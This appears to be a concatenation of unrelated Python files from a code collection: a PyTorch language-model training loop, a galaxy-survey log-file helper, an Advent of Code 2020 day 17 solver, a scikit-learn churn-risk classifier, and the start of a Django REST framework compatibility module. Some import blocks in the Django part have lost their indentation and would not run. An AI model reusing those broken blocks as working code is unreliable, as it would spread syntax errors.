# └ f l r x ┘.
# These columns are treated as independent by the model, which means that the
# dependence of e. g. 'g' on 'f' can not be learned, but allows more efficient
# batch processing.
def batchify(data, bsz):
    """Reshape a flat token tensor into `bsz` independent columns.

    Trailing tokens that do not fill a whole row are dropped; the result is
    moved to the module-level `device`.
    """
    # Number of full rows each of the bsz columns can hold.
    rows = data.size(0) // bsz
    trimmed = data.narrow(0, 0, rows * bsz)
    columns = trimmed.view(bsz, -1).t().contiguous()
    return columns.to(device)
# Validation/test use a smaller fixed batch size than training.
eval_batch_size = 10
train_data = batchify(corpus.train, args.batch_size)
val_data = batchify(corpus.valid, eval_batch_size)
test_data = batchify(corpus.test, eval_batch_size)
###############################################################################
# Build the model
###############################################################################
ntokens = len(corpus.dictionary)
# Instantiate the architecture selected by --model; all share the same
# (ntokens, emsize, nhid, nlayers, dropout) hyper-parameters.
if args.model == 'LSTM':
    from model.rnn_lm import RNNLM
    model = RNNLM(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.tied).to(device)
elif args.model == 'Transformer':
    from model.transformer_lm import TransformerLM
    model = TransformerLM(ntokens, args.emsize, args.nhead, args.nhid, args.nlayers, args.dropout).to(device)
elif args.model == 'DNC':
    from model.dnc_lm import DNCLM
    model = DNCLM(ntoken=ntokens, ninp=args.emsize, nhid=args.nhid, nlayers=args.nlayers, dropout=args.dropout).to(device)
criterion = nn.CrossEntropyLoss()
print(args)
###############################################################################
# Training code
###############################################################################
def detach_hidden(h):
    """Wraps hidden states in new Tensors, to detach them from their history.

    Recurses through lists, tuples and dicts; dicts are updated in place,
    lists/tuples are rebuilt. Anything else (including None) passes through.
    """
    if isinstance(h, torch.Tensor):
        return h.detach()
    if isinstance(h, list):
        return [detach_hidden(item) for item in h]
    if isinstance(h, tuple):
        return tuple(detach_hidden(item) for item in h)
    if isinstance(h, dict):
        for key, value in h.items():
            h[key] = detach_hidden(value)
        return h
    # None and unrecognized containers are returned unchanged.
    return h
# get_batch subdivides the source data into chunks of length args.bptt.
# If source is equal to the example output of the batchify function, with
# a bptt-limit of 2, we'd get the following two Variables for i = 0:
# ┌ a g m s ┐ ┌ b h n t ┐
# └ b h n t ┘ └ c i o u ┘
# Note that despite the name of the function, the subdivison of data is not
# done along the batch dimension (i.e. dimension 1), since that was handled
# by the batchify function. The chunks are along dimension 0, corresponding
# to the seq_len dimension in the LSTM.
def get_batch(source, i):
    """Slice a chunk of up to args.bptt rows starting at i, plus flattened
    next-token targets (the same slice shifted by one)."""
    seq_len = min(args.bptt, len(source) - 1 - i)
    chunk = source[i:i + seq_len]
    labels = source[i + 1:i + 1 + seq_len].view(-1)
    return chunk, labels
def evaluate(data_source):
    """Return the average per-token loss of the global `model` over data_source.

    Uses the module-level model, corpus, args, criterion and eval_batch_size.
    """
    # Turn on evaluation mode which disables dropout.
    model.eval()
    total_loss = 0.
    ntokens = len(corpus.dictionary)
    if args.model != 'Transformer':
        hidden = model.init_hidden(eval_batch_size)
    with torch.no_grad():
        for i in range(0, data_source.size(0) - 1, args.bptt):
            data, targets = get_batch(data_source, i)
            if args.model == 'Transformer':
                output = model(data)
            else:
                output, hidden = model(data, hidden)
                hidden = detach_hidden(hidden)
            output_flat = output.view(-1, ntokens)
            # Weight each chunk's loss by its length so shorter final chunks
            # don't skew the average.
            total_loss += len(data) * criterion(output_flat, targets).item()
    return total_loss / (len(data_source) - 1)
def train():
    """Run one training epoch over train_data.

    Uses the module-level model, optimizer, criterion, args, epoch and lr
    (the last two only for progress logging).
    """
    # Turn on training mode which enables dropout.
    model.train()
    total_loss = 0.
    start_time = time.time()
    ntokens = len(corpus.dictionary)
    if args.model != 'Transformer':
        hidden = model.init_hidden(args.batch_size)
    for batch, i in enumerate(range(0, train_data.size(0) - 1, args.bptt)):
        data, targets = get_batch(train_data, i)
        # Starting each batch, we detach the hidden state from how it was previously produced.
        # If we didn't, the model would try backpropagating all the way to start of the dataset.
        model.zero_grad()
        if args.model == 'LSTM':
            hidden = detach_hidden(hidden)
            output, hidden = model(data, hidden)
        elif args.model == 'Transformer':
            output = model(data)
        elif args.model == 'DNC':
            hidden = detach_hidden(hidden)
            output, hidden = model(data, hidden)
        loss = criterion(output.view(-1, ntokens), targets)
        loss.backward()
        # `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.
        torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)
        optimizer.step()
        total_loss += loss.item()
        if batch % args.log_interval == 0 and batch > 0:
            # Report the mean loss and perplexity over the last interval.
            cur_loss = total_loss / args.log_interval
            elapsed = time.time() - start_time
            print('| epoch {:3d} | {:5d}/{:5d} batches | lr {:02.2e} | ms/batch {:5.2f} | '
                  'loss {:5.2f} | ppl {:8.2f}'.format(
                epoch, batch, len(train_data) // args.bptt, lr,
                elapsed * 1000 / args.log_interval, cur_loss, math.exp(cur_loss)))
            total_loss = 0
            start_time = time.time()
# Loop over epochs.
lr = args.lr
best_val_loss = None
# optimizer = optim.Adam(model.parameters(), lr=lr)
optimizer = optim.SGD(model.parameters(), lr=lr)
# At any point you can hit Ctrl + C to break out of training early.
try:
    for epoch in range(args.epochs):
        epoch_start_time = time.time()
        train()
        val_loss = evaluate(val_data)
        print('-' * 89)
        print('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '
              'valid ppl {:8.2f}'.format(epoch, (time.time() - epoch_start_time),
                                         val_loss, math.exp(val_loss)))
        print('-' * 89)
        # Save the model if the validation loss is the best we've seen so far.
        # NOTE(review): `not best_val_loss` is also true for a 0.0 loss; the
        # intent here is the first-epoch None check.
        if not best_val_loss or val_loss < best_val_loss:
            torch.save(model, path)
            best_val_loss = val_loss
        else:
            # Anneal the learning rate if no improvement has been seen in the validation dataset.
            lr /= 4
            for param_group in optimizer.param_groups:
                param_group['lr'] = lr
except KeyboardInterrupt:
    print('-' * 89)
    print('Exiting from training early')
# Load the best saved model.
model = torch.load(path)
# after load the rnn params are not a continuous chunk of memory
# this makes them a continuous chunk, and will speed up forward pass
# Currently, only rnn model supports flatten_parameters function.
if args.model in ['LSTM']:
    model.rnn.flatten_parameters()
# Run on test data.
test_loss = evaluate(test_data)
print('=' * 89)
print('| End of training | test loss {:5.2f} | test ppl {:8.2f}'.format(
    test_loss, math.exp(test_loss)))
print('=' * 89)
|
<gh_stars>1-10
from importer import *
import os
import numpy as np
from datetime import datetime as dt
import re
def gen_logfile_name(plateifu):
    """Return the per-galaxy log path: $PCAY_RESULTSDIR/<plate>/<plateifu>.log

    Args:
        plateifu (str): '<plate>-<ifu>' identifier; only the plate part is
            used for the directory.

    Returns:
        str: full path of the log file (not created here).
    """
    # Only the plate is needed; the original also unpacked an unused `ifu`.
    plate = plateifu.split('-')[0]
    status_file_dir = os.path.join(
        os.environ['PCAY_RESULTSDIR'], plate)
    return os.path.join(status_file_dir, '{}.log'.format(plateifu))
def log_file_exists(plateifu):
    """Return True when a log file has already been written for this galaxy."""
    return os.path.exists(gen_logfile_name(plateifu))
def log_indicates_complete(plateifu):
    '''judges galaxy completeness and rerun priority based on log-file

    Returns
    -------
    complete : bool
        whether the analysis finished successfully
    hipri : bool
        whether the galaxy should be prioritized for a re-run
    '''
    status_file = gen_logfile_name(plateifu)
    if not log_file_exists(plateifu):
        # if log-file hasn't been written, a previous parent process probably died
        # before getting to it, so probably good to re-run
        complete, hipri = False, True
    else:
        # if log file exists, check contents of last two lines for graceful exit and analysis success
        with open(status_file, 'r') as logf:
            lines = logf.readlines()
        if len(lines) < 2:
            # FIX: an empty or one-line log previously raised IndexError on
            # lines[-1] / lines[-2]; treat it like a writer that died mid-run
            complete, hipri = False, True
        elif not re.search('ENDING GRACEFULLY', lines[-1]):
            # if last line of logfile does not indicate graceful exit from analysis
            # this is probably a segfault case, so do not prioritize for re-run
            complete, hipri = False, False
        elif not re.search('SUCCESS', lines[-2]):
            # if second-last line of logfile does not indicate success
            # this is probably some other error like missing data,
            # and it would be worth trying to re-run
            complete, hipri = False, True
        else:
            # if last line indicates graceful exit, AND second-last line indicates overall success
            # this galaxy is done, and shouldn't be re-run at all
            complete, hipri = True, False
    return complete, hipri
def write_log_file(plateifu, msg, clobber=False):
    '''write a time-stamped message to the galaxy's log file

    With clobber=True the file is overwritten; otherwise the message is
    appended on a fresh line.
    '''
    status_file = gen_logfile_name(plateifu)
    log_dir = os.path.dirname(status_file)
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)
    stamped = '{} {}'.format(dt.now().strftime('%Y/%m/%d@%H:%M:%S'), msg)
    if clobber:
        mode, payload = 'w', stamped
    else:
        mode, payload = 'a', '\n{}'.format(stamped)
    with open(status_file, mode) as logf:
        logf.write(payload)
def summary_remaining(drpall, group_col='ifudesignsize'):
    # Classify every galaxy as complete / high-priority rerun / low-priority
    # rerun based on its log file, then print per-group counts.
    complete, hipri = zip(*list(map(log_indicates_complete, drpall['plateifu'])))
    complete, hipri = np.array(complete), np.array(hipri)
    drpall['complete'] = complete
    drpall['hipri_rerun'] = hipri
    # low-priority reruns: neither complete nor flagged high-priority
    drpall['lopri_rerun'] = (~hipri) & (~complete)
    # multi-column selection — drpall is presumably an astropy Table; confirm
    runtab = drpall[group_col, 'complete', 'hipri_rerun', 'lopri_rerun']
    runtab_group = runtab.group_by(group_col)
    # summing booleans per group yields per-group counts
    runtab_groupstats = runtab_group.groups.aggregate(np.sum)
    print(runtab_groupstats)
if __name__ == '__main__':
    import manga_tools as m
    # NOTE(review): mpl_v is presumably provided by `from importer import *` — confirm
    drpall = m.load_drpall(mpl_v)
    # keep only galaxies with a valid IFU size and a measured NSA redshift
    drpall = drpall[(drpall['ifudesignsize'] > 0) * (drpall['nsa_z'] != -9999.)]
    #print(drpall)
    summary_remaining(drpall)
|
<filename>2020/17.py
import time
def calc_neighbours(coordinates, state, expand=True, four_d = False):
    """Count the live neighbours of one cell.

    Returns (live_neighbours, new_cells). When `expand` is set and the cell
    itself is live ('#'), `new_cells` maps each neighbouring coordinate not
    yet tracked in `state` to ['.', <its own live-neighbour count>], so the
    simulation frontier can grow; the recursive call uses expand=False so
    discovery stops after one layer.
    """
    new_cells = dict()
    live_neighbours = 0
    w_deltas = range(-1, 2) if four_d else [0]
    offsets = ((dx, dy, dz, dw)
               for dx in range(-1, 2)
               for dy in range(-1, 2)
               for dz in range(-1, 2)
               for dw in w_deltas)
    for dx, dy, dz, dw in offsets:
        if (dx, dy, dz, dw) == (0, 0, 0, 0):
            continue  # skip the cell itself
        neighbour = (coordinates[0] + dx, coordinates[1] + dy,
                     coordinates[2] + dz, coordinates[3] + dw)
        if neighbour in state:
            if state[neighbour][0] != '.':
                live_neighbours += 1  # tracked, live cube
        elif expand and state[coordinates][0] == '#':
            # untracked neighbour of a live cube: start tracking it as dead,
            # along with its own neighbour count for future generations
            new_cells[neighbour] = ['.', calc_neighbours(neighbour, state, False, four_d)[0]]
    return (live_neighbours, new_cells)
def calc_all_neighbours(state, four_d):
    """Refresh the live-neighbour count of every tracked cell in place,
    then start tracking any untracked cells adjacent to live ones."""
    discovered = {}
    for coords in state:
        count, frontier = calc_neighbours(coords, state, True, four_d)
        state[coords][1] = count
        discovered.update(frontier)
    # fold the newly discovered frontier cells into the simulation
    state.update(discovered)
def init_state(items):
    """Build the initial cell map from the puzzle's 2-D grid of row strings.

    Cells are keyed by (x, y, z, w) and stored as
    [character, live_neighbour_count]; the grid sits on the z=0, w=0 plane.
    """
    return {(x, y, 0, 0): [ch, 0]
            for y, row in enumerate(items)
            for x, ch in enumerate(row)}
def do_generation(state, four_d):
    """Advance the cellular automaton one generation, mutating `state` in place."""
    calc_all_neighbours(state, four_d)
    # Dead cells with fewer than 3 live neighbours cannot activate this
    # generation, so drop them to keep the tracked set small.
    doomed = [c for c in state if state[c][0] == '.' and state[c][1] < 3]
    for coords in doomed:
        del state[coords]
    for cell in state.values():
        if cell[0] == '.' and cell[1] == 3:
            cell[0] = '#'  # birth
        elif cell[0] == '#' and not (2 <= cell[1] <= 3):
            cell[0] = '.'  # death by under- or over-population
def run_simulation(state, num_generations, four_d=False):
    """Run `num_generations` steps of the automaton on `state` (mutated in place).

    Returns the number of live ('#') cells after the final generation.
    FIX: `live_count` was previously only assigned inside the loop, so
    num_generations == 0 raised NameError; it is now defined up front.
    """
    live_count = sum(1 for s in state if state[s][0] == '#')
    for i in range(num_generations):
        do_generation(state, four_d)
        live_count = sum(1 for s in state if state[s][0] == '#')
        print(f'After generation {i+1} there are {live_count} live cells')
    return live_count
def main():
    # Solve both parts of AoC 2020 day 17 (6 generations each) and print results.
    results = []
    with open('17-input.txt', 'r') as f:
        items = [i.strip() for i in f.read().splitlines()]
    # Part 1
    print('Part 1')
    state = init_state(items)
    results.append(run_simulation(state, 6))
    # Part 2: same input, but simulate the 4th dimension too.
    # A fresh state is built because run_simulation mutates it.
    print('Part 2')
    state = init_state(items)
    results.append(run_simulation(state, 6, True))
    for i,s in enumerate(results):
        print(f'{i+1}: {s}')
if __name__ == '__main__':
    start_time = time.time_ns()
    main()
    # time_ns() is in nanoseconds; divide by 1e9 for seconds
    print("--- Executed in {0:.3f} seconds ---".format((time.time_ns() - start_time) / (10 ** 9)))
<reponame>blallen/CodePractice<gh_stars>0
from sklearn.preprocessing import MinMaxScaler
from sklearn.compose import make_column_transformer
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.colors as mcolors
import numpy
import pandas
import sklearn
import matplotlib.pyplot as plot
import matplotlib.patches as mpatches
import scikitplot as skplot
from sklearn import impute
from sklearn import preprocessing
from sklearn import pipeline
from sklearn import compose
from sklearn import model_selection
from sklearn import metrics
from sklearn import ensemble
###############
## Get the data
###############
# import data
df_churn = pandas.read_csv('mergedcustomers_missing_values_GENDER.csv')
# remove columns that are not required (ID carries no signal)
df_churn = df_churn.drop(['ID'], axis=1)
print(df_churn.head())
###############
## Basic Counting
###############
print("The dataset contains columns of the following data types : \n" +str(df_churn.dtypes))
print("The dataset contains following number of records for each of the columns : \n" +str(df_churn.count()))
print( "Each category within the churnrisk column has the following count : ")
print(df_churn.groupby(['CHURNRISK']).size())
# .count() will do a count in each column, lots of redundant data
# .size() will do the same count, but only display once for each value of 'CHURNRISK'
###############
## Basic Plotting
###############
# bar chart to show split of data
# NOTE(review): `index` appears unused — value_counts supplies its own ordering.
index = ['High','Medium','Low']
color = ['#BB6B5A','#8CCB9B','#E5E88B']
title = "Total number for occurences of churn risk " + str(df_churn['CHURNRISK'].count())
# fig size is in inches x.x
churn_plot = df_churn['CHURNRISK'] \
    .value_counts(sort = True, ascending = False) \
    .plot(kind = 'bar', figsize=(4,4), title = title, color = color)
churn_plot.set_xlabel("Churn Risk")
churn_plot.set_ylabel("Frequency")
churn_plot.get_figure().savefig('churn_plot.pdf', bbox_inches='tight')
# bbox_inches='tight' trims surrounding whitespace from the saved figure
###############
## Data Cleaning
###############
# Defining the categorical columns
columns_categorical = ['GENDER', 'STATUS', 'HOMEOWNER']
print("Categorical columns : ")
print(columns_categorical)
# fill missing categorical values with the column's most frequent value
# (the categorical analogue of imputing the mode) before one-hot encoding
impute_categorical = impute.SimpleImputer(strategy = 'most_frequent')
onehot_categorical = preprocessing.OneHotEncoder(
    handle_unknown = 'error',
    drop = 'if_binary',
)
transformer_categorical = pipeline.Pipeline(
    steps = [
        ('impute', impute_categorical),
        ('onehot', onehot_categorical),
    ]
)
# Defining the numerical columns
# FIX: numpy.float / numpy.int were deprecated aliases of the Python builtins
# and were removed in NumPy 1.24; using the builtins selects the same dtypes.
columns_numerical = df_churn.select_dtypes(
    include = [float, int]
).columns
print("Numerical columns : ")
print(columns_numerical)
scaler_numerical = preprocessing.StandardScaler()
transformer_numerical = pipeline.Pipeline(steps = [('scale', scaler_numerical)])
# start setting up preprocessors
preprocessor_categorical = compose.ColumnTransformer(
    transformers = [('cat', transformer_categorical, columns_categorical)],
    remainder = 'passthrough',
)
preprocessor_numerical = compose.ColumnTransformer(
    transformers = [('num', transformer_numerical, columns_numerical)],
    remainder = 'passthrough',
)
preprocessor_all = compose.ColumnTransformer(
    transformers = [
        ('cat', transformer_categorical, columns_categorical),
        ('num', transformer_numerical, columns_numerical),
    ],
    remainder = 'passthrough'
)
# The transformation happens in the pipeline. Temporarily done here to show what intermediate value looks like.
# ColumnTransformer.fit_transform() returns a numpy.ndarray
# wrap with pandas.DataFrame for more utility
df_churn_cat = pandas.DataFrame(preprocessor_categorical.fit_transform(df_churn))
print("Data after transforming categorical columns:")
print(df_churn_cat.head())
df_churn_num = pandas.DataFrame(preprocessor_numerical.fit_transform(df_churn))
print("Data after transforming numerical columns:")
print(df_churn_num.head())
df_churn_all = pandas.DataFrame(preprocessor_all.fit_transform(df_churn))
print("Data after transforming all columns:")
print(df_churn_all.head())
# prepare data frame for splitting into train and test sets
features = df_churn.drop(['CHURNRISK'], axis = 1)
label = df_churn['CHURNRISK']
# encode the High/Low/Medium strings into integer class labels
label_encoder = preprocessing.LabelEncoder()
label = label_encoder.fit_transform(label)
print("Encoded value of Churnrisk after applying label encoder : " + str(label))
###############
## Fancy Plotting
###############
def colormap(risk_list):
    """Convert encoded churn-risk labels to hex colours.

    0 -> high (red), 2 -> medium (yellow), 1 -> low (green); labels outside
    this set are silently skipped.
    """
    palette = {0: '#BB6B5A', 2: '#E5E88B', 1: '#8CCB9B'}
    return [palette[label] for label in risk_list if label in palette]
# one legend patch per churn-risk class
pop_a = mpatches.Patch(color='#BB6B5A', label='High')
pop_b = mpatches.Patch(color='#E5E88B', label='Medium')
pop_c = mpatches.Patch(color='#8CCB9B', label='Low')
handles = [pop_a, pop_b, pop_c]
area = 75  # scatter marker size
x = df_churn['ESTINCOME']
y = df_churn['DAYSSINCELASTTRADE']
z = df_churn['TOTALDOLLARVALUETRADED']
fig = plot.figure(figsize = (12, 6))
fig.suptitle('2D and 3D view of churn risk data')
# first sub plot: income vs days since last trade
ax_2D = fig.add_subplot(1, 2, 1)
ax_2D.scatter(x, y, alpha = 0.8, c = colormap(label), s = area)
ax_2D.set_ylabel('DAYS SINCE LAST TRADE')
ax_2D.set_xlabel('ESTIMATED INCOME')
plot.legend(handles = handles)
# second sub plot: adds total dollar value traded as a third axis
ax_3D = fig.add_subplot(1, 2, 2, projection = '3d')
ax_3D.scatter(z, x, y, c = colormap(label), marker = 'o')
ax_3D.set_xlabel('TOTAL DOLLAR VALUE TRADED')
ax_3D.set_ylabel('ESTIMATED INCOME')
ax_3D.set_zlabel('DAYS SINCE LAST TRADE')
plot.legend(handles = handles)
fig.savefig('fancy_plot.pdf', bbox_inches='tight')
###############
## Split data
###############
X_train, X_test, y_train, y_test = model_selection.train_test_split(features, label, random_state = 0)
print("Dimensions of datasets that will be used for training : Input features" + str(X_train.shape) + " Output label" + str(y_train.shape))
print("Dimensions of datasets that will be used for testing : Input features" + str(X_test.shape) + " Output label" + str(y_test.shape))
def compare_2D(X_test, y_test, y_pred, model_name, handles):
    """Side-by-side 2D scatter of actual vs. predicted churn-risk classes.

    Plots ESTINCOME vs. DAYSSINCELASTTRADE, colours points per class via
    colormap(), titles the figure with the model's accuracy and saves it to
    '<model_name>_2D.pdf'.

    Parameters
    ----------
    X_test : DataFrame with ESTINCOME and DAYSSINCELASTTRADE columns
    y_test, y_pred : encoded class labels (actual / predicted)
    model_name : str used in the title and output filename
    handles : matplotlib legend handles for the three risk classes
    """
    fig = plot.figure(figsize = (10, 4))
    score = metrics.accuracy_score(y_test, y_pred)
    suptitle = 'Actual vs Predicted data : ' + model_name + '. Accuracy : %.2f' % score
    fig.suptitle(suptitle)
    # left panel: ground-truth labels
    ax_test = fig.add_subplot(121)
    ax_test.scatter(
        X_test['ESTINCOME'],
        X_test['DAYSSINCELASTTRADE'],
        alpha = 0.8,
        c = colormap(y_test),
    )
    ax_test.set_xlabel('ESTIMATED INCOME')
    ax_test.set_ylabel('DAYS SINCE LAST TRADE')
    plot.title('Actual')
    plot.legend(handles = handles)
    # right panel: model predictions
    ax_pred = fig.add_subplot(122)
    ax_pred.scatter(
        X_test['ESTINCOME'],
        X_test['DAYSSINCELASTTRADE'],
        alpha = 0.8,
        c = colormap(y_pred),
    )
    ax_pred.set_xlabel('ESTIMATED INCOME')
    ax_pred.set_ylabel('DAYS SINCE LAST TRADE')
    plot.title('Predicted')
    # FIX: use the `handles` parameter (was hard-coded [pop_a, pop_b, pop_c] globals)
    plot.legend(handles = handles)
    fig.savefig(model_name + '_2D.pdf', bbox_inches='tight')
def compare_3D(X_test, y_test, y_pred, model_name, handles):
    """Side-by-side 3D scatter of actual vs. predicted churn-risk classes.

    Axes: TOTALDOLLARVALUETRADED / ESTINCOME / DAYSSINCELASTTRADE; points are
    coloured per class via colormap(); the figure is titled with the model's
    accuracy and saved to '<model_name>_3D.pdf'.
    """
    fig = plot.figure(figsize = (10, 4))
    score = metrics.accuracy_score(y_test, y_pred)
    suptitle = 'Actual vs Predicted data : ' + model_name + '. Accuracy : %.2f' % score
    fig.suptitle(suptitle)
    # left panel: ground-truth labels
    ax_test = fig.add_subplot(121, projection = '3d')
    ax_test.scatter(
        X_test['TOTALDOLLARVALUETRADED'],
        X_test['ESTINCOME'],
        X_test['DAYSSINCELASTTRADE'],
        alpha = 0.8,
        c = colormap(y_test),
        marker = 'o',
    )
    ax_test.set_xlabel('TOTAL DOLLAR VALUE TRADED')
    ax_test.set_ylabel('ESTIMATED INCOME')
    ax_test.set_zlabel('DAYS SINCE LAST TRADE')
    # FIX: use the `handles` parameter (was hard-coded [pop_a, pop_b, pop_c] globals)
    plot.legend(handles = handles)
    plot.title('Actual')
    # right panel: model predictions
    ax_pred = fig.add_subplot(122, projection = '3d')
    ax_pred.scatter(
        X_test['TOTALDOLLARVALUETRADED'],
        X_test['ESTINCOME'],
        X_test['DAYSSINCELASTTRADE'],
        alpha = 0.8,
        c = colormap(y_pred),
        marker = 'o',
    )
    ax_pred.set_xlabel('TOTAL DOLLAR VALUE TRADED')
    ax_pred.set_ylabel('ESTIMATED INCOME')
    ax_pred.set_zlabel('DAYS SINCE LAST TRADE')
    plot.legend(handles = handles)  # FIX: same as above
    plot.title('Predicted')
    fig.savefig(model_name + '_3D.pdf', bbox_inches='tight')
def model_metrics(X_test, y_test, y_pred, model, name):
    # Print the predicted classes, save a normalized confusion matrix and
    # print the classification report.
    # NOTE(review): the message mentions the inverse label encoding, but
    # y_pred here is still the encoded labels — confirm callers' intent.
    print("Decoded values of churn risk after applying inverse of label encoder : " + str(numpy.unique(y_pred)))
    # NOTE(review): metrics.plot_confusion_matrix was removed in scikit-learn
    # 1.2; newer versions require ConfusionMatrixDisplay.from_estimator.
    disp = metrics.plot_confusion_matrix(
        model,
        X_test,
        y_test,
        normalize = 'pred',  # normalize over predicted (column) totals
        cmap = 'Greens',
    )
    disp.figure_.savefig(name + '_confusion_matrix.pdf', bbox_inches='tight')
    report = metrics.classification_report(y_test, y_pred)
    print("The classification report for the model : \n\n")
    print(report)
###############
## Build models
###############
name_rfc = 'random_forest'
classifier_rfc = ensemble.RandomForestClassifier(
    n_estimators = 100,
    max_depth = 2,
    random_state = 0,
)
model_rfc = pipeline.Pipeline(
    steps = [
        ('preprocessor_all', preprocessor_all),
        ('classifier', classifier_rfc),
    ],
)
model_rfc.fit(X_train, y_train)
y_pred_rfc = model_rfc.predict(X_test)
# NOTE(review): the block below reuses the *_rfc names, so the random-forest
# model and predictions above are overwritten and only the gradient-boosting
# model is evaluated later — confirm this is intended.
name_rfc = 'grad_boost'
classifier_rfc = ensemble.GradientBoostingClassifier(
    n_estimators = 100,
    max_depth = 2,
    random_state = 0,
)
model_rfc = pipeline.Pipeline(
    steps = [
        ('preprocessor_all', preprocessor_all),
        ('classifier', classifier_rfc),
    ],
)
model_rfc.fit(X_train, y_train)
y_pred_rfc = model_rfc.predict(X_test)
###############
## Evaluate models
###############
compare_2D(X_test, y_test, y_pred_rfc, name_rfc, handles)
compare_3D(X_test, y_test, y_pred_rfc, name_rfc, handles)
# NOTE(review): the decoded labels below are computed but never used;
# model_metrics receives the still-encoded y_test / y_pred_rfc.
y_test_inv = label_encoder.inverse_transform(y_test)
y_pred_inv_rfc = label_encoder.inverse_transform(y_pred_rfc)
model_metrics(X_test, y_test, y_pred_rfc, model_rfc, name_rfc)
"""
The `compat` module provides support for backwards compatibility with older
versions of django/python, and compatibility wrappers around optional packages.
"""
# flake8: noqa
from __future__ import unicode_literals
from django.core.exceptions import ImproperlyConfigured
from django.conf import settings
from django.db import connection, transaction
from django.utils.encoding import force_text
from django.utils.six.moves.urllib.parse import urlparse as _urlparse
from django.utils import six
import django
import inspect
try:
import importlib
except ImportError:
from django.utils import importlib
def unicode_repr(instance):
    """repr() that is a unicode string on both Python 2 and 3."""
    raw = repr(instance)
    if six.PY2:
        # Python 2 repr() returns bytes; decode to unicode.
        raw = raw.decode('utf-8')
    return raw
def unicode_to_repr(value):
    """Coerce a unicode string to the native ``__repr__`` return type
    (bytes on Python 2, str on Python 3)."""
    return value.encode('utf-8') if six.PY2 else value
def unicode_http_header(value):
    """Coerce an HTTP header value to unicode (headers are latin-1)."""
    if not isinstance(value, six.binary_type):
        return value
    return value.decode('iso-8859-1')
def total_seconds(timedelta):
    """Duration of *timedelta* in float seconds.

    timedelta.total_seconds() only exists on Python >= 2.7; fall back to the
    manual day/second/microsecond arithmetic on older versions.
    """
    try:
        return timedelta.total_seconds()
    except AttributeError:
        days, secs, micros = timedelta.days, timedelta.seconds, timedelta.microseconds
        return days * 86400.0 + float(secs) + micros / 1000000.0
# OrderedDict only available in Python 2.7.
# This will always be the case in Django 1.7 and above, as these versions
# no longer support Python 2.6.
# For Django <= 1.6 and Python 2.6 fall back to SortedDict.
try:
    from collections import OrderedDict
except ImportError:
    from django.utils.datastructures import SortedDict as OrderedDict
# HttpResponseBase only exists from 1.5 onwards
try:
    from django.http.response import HttpResponseBase
except ImportError:
    # Django < 1.5: plain HttpResponse is the closest base class
    from django.http import HttpResponse as HttpResponseBase
# contrib.postgres only supported from 1.8 onwards.
try:
    from django.contrib.postgres import fields as postgres_fields
except ImportError:
    # None signals "postgres fields unavailable" to consumers
    postgres_fields = None
# request only provides `resolver_match` from 1.5 onwards.
def get_resolver_match(request):
    """Return request.resolver_match, resolving the path manually on
    Django < 1.5 where the attribute does not exist."""
    if hasattr(request, 'resolver_match'):
        return request.resolver_match
    # Django < 1.5
    from django.core.urlresolvers import resolve
    return resolve(request.path_info)
# django-filter is optional
try:
import django_filters
except ImportError:
django_filters = None
if django.VERSION >= (1, 6):
    def clean_manytomany_helptext(text):
        # 1.6+ no longer appends boilerplate, so nothing to strip
        return text
else:
    # Up to version 1.5 many to many fields automatically suffix
    # the `help_text` attribute with hardcoded text.
    def clean_manytomany_helptext(text):
        if text.endswith(' Hold down "Control", or "Command" on a Mac, to select more than one.'):
            # strip the hardcoded suffix (69 characters)
            text = text[:-69]
        return text
# Django-guardian is optional. Import only if guardian is in INSTALLED_APPS
# Fixes (#1712). We keep the try/except for the test suite.
# `guardian` stays None when the app is absent or the import fails.
guardian = None
if 'guardian' in settings.INSTALLED_APPS:
    try:
        import guardian
        import guardian.shortcuts # Fixes #1624
    except ImportError:
        pass
def get_model_name(model_cls):
    """Return the model's lowercase name from its _meta options.

    Django < 1.6 exposed this as `module_name` instead of `model_name`.
    """
    meta = model_cls._meta
    if hasattr(meta, 'model_name'):
        return meta.model_name
    # < 1.6 used module_name instead of model_name
    return meta.module_name
# Support custom user models in Django 1.5+
try:
    from django.contrib.auth import get_user_model
except ImportError:
    # Django < 1.5: only the concrete User model exists, so emulate the API
    from django.contrib.auth.models import User
    get_user_model = lambda: User
# View._allowed_methods only present from 1.5 onwards
if django.VERSION >= (1, 5):
    from django.views.generic import View
else:
    from django.views.generic import View as DjangoView
    class View(DjangoView):
        # Backport: list the HTTP methods this view actually implements.
        def _allowed_methods(self):
            return [m.upper() for m in self.http_method_names if hasattr(self, m)]
# MinValueValidator, MaxValueValidator et al. only accept `message` in 1.8+
if django.VERSION >= (1, 8):
    from django.core.validators import MinValueValidator, MaxValueValidator
    from django.core.validators import MinLengthValidator, MaxLengthValidator
else:
    # Older Django: wrap each validator so a custom `message` kwarg is
    # accepted (popped and stored) before delegating to the stock class.
    from django.core.validators import MinValueValidator as DjangoMinValueValidator
    from django.core.validators import MaxValueValidator as DjangoMaxValueValidator
    from django.core.validators import MinLengthValidator as DjangoMinLengthValidator
    from django.core.validators import MaxLengthValidator as DjangoMaxLengthValidator
    class MinValueValidator(DjangoMinValueValidator):
        def __init__(self, *args, **kwargs):
            self.message = kwargs.pop('message', self.message)
            super(MinValueValidator, self).__init__(*args, **kwargs)
    class MaxValueValidator(DjangoMaxValueValidator):
        def __init__(self, *args, **kwargs):
            self.message = kwargs.pop('message', self.message)
            super(MaxValueValidator, self).__init__(*args, **kwargs)
    class MinLengthValidator(DjangoMinLengthValidator):
        def __init__(self, *args, **kwargs):
            self.message = kwargs.pop('message', self.message)
            super(MinLengthValidator, self).__init__(*args, **kwargs)
    class MaxLengthValidator(DjangoMaxLengthValidator):
        def __init__(self, *args, **kwargs):
            self.message = kwargs.pop('message', self.message)
            super(MaxLengthValidator, self).__init__(*args, **kwargs)
# URLValidator only accepts `message` in 1.6+
if django.VERSION >= (1, 6):
    from django.core.validators import URLValidator
else:
    # wrap so a custom `message` kwarg is accepted on older Django
    from django.core.validators import URLValidator as DjangoURLValidator
    class URLValidator(DjangoURLValidator):
        def __init__(self, *args, **kwargs):
            self.message = kwargs.pop('message', self.message)
            super(URLValidator, self).__init__(*args, **kwargs)
# EmailValidator requires explicit regex prior to 1.6+
if django.VERSION >= (1, 6):
    from django.core.validators import EmailValidator
else:
    # older Django: supply the stock email regex explicitly
